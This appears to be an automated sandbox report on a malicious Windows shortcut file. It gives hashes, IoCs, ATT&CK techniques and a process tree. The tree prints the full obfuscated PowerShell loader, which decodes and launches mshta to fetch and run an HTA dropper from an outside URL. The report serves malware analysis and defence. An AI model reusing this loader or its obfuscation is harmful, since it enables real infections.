c88f8fe20ad9910200377a94c939be0bbfa16889b5418dfca1fe0fb4fd03973c

General

Target

267-3099-39.lnk
Size

2KB
MD5

d940f57ff05d71eb52b1c1ab693edcf1
SHA1

4da1c51a0cad571c6121a62ffb4b837135809e5f
SHA256

2599c81a8c6e1b8682085a21735631e86ae4450db88dc82ac568424c0a7ed5ad
SHA512

c0ad443c81a32bdcc4674f66e228067c87fc53027a9839b3dbf3b82711b68a9a9d698a1d08472f36cfe14ae10ec518d5ba68fd91b5e980d7b35e8125c5511e13

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://modhub.com.br/upload.hta

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exe

flow pid process

4 1868 mshta.exe
5 1868 mshta.exe
6 1868 mshta.exe
7 1868 mshta.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1712 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1712 powershell.exe

flow	pid	process
4	1868	mshta.exe
5	1868	mshta.exe
6	1868	mshta.exe
7	1868	mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1712	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1712	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1480 wrote to memory of 1712	1480	cmd.exe	powershell.exe
PID 1480 wrote to memory of 1712	1480	cmd.exe	powershell.exe
PID 1480 wrote to memory of 1712	1480	cmd.exe	powershell.exe
PID 1712 wrote to memory of 1868	1712	powershell.exe	mshta.exe
PID 1712 wrote to memory of 1868	1712	powershell.exe	mshta.exe
PID 1712 wrote to memory of 1868	1712	powershell.exe	mshta.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\267-3099-39.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#;V[u?g|')?#>$DQLuekQGuuECDBbyraLZ=@(54990,54996,54985,54997,54978,54913,54985,54997,54997,54993,54996,54939,54928,54928,54990,54992,54981,54985,54998,54979,54927,54980,54992,54990,54927,54979,54995,54928,54998,54993,54989,54992,54978,54981,54927,54985,54997,54978);<#;V[u?g|')?#>$GuOUaorkYlZ=@(54954,54950,54969);<#;V[u?g|')?#>function rumzkRHswcDsUsFC($YeFkGODsh){$HJgmjnWAJPf=54881;<#;V[u?g|')?#>$RMPUtpu=$Null;foreach($XTtbqSkqQgZM in $YeFkGODsh){$RMPUtpu+=[char]($XTtbqSkqQgZM-$HJgmjnWAJPf)};return $RMPUtpu};sal ghWolInCgDSAYIndj (rumzkRHswcDsUsFC $GuOUaorkYlZ);<#;V[u?g|')?#>ghWolInCgDSAYIndj((rumzkRHswcDsUsFC $DQLuekQGuuECDBbyraLZ));
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta
3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1868

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1480-54-0x000007FEFB721000-0x000007FEFB723000-memory.dmp

Filesize
8KB

Download
memory/1712-88-0x0000000000000000-mapping.dmp

Download
memory/1712-93-0x000007FEF33A0000-0x000007FEF3DC3000-memory.dmp

Filesize
10.1MB

Download
memory/1712-94-0x000007FEF2840000-0x000007FEF339D000-memory.dmp

Filesize
11.4MB

Download
memory/1712-95-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/1712-97-0x00000000025EB000-0x000000000260A000-memory.dmp

Filesize
124KB

Download
memory/1868-96-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing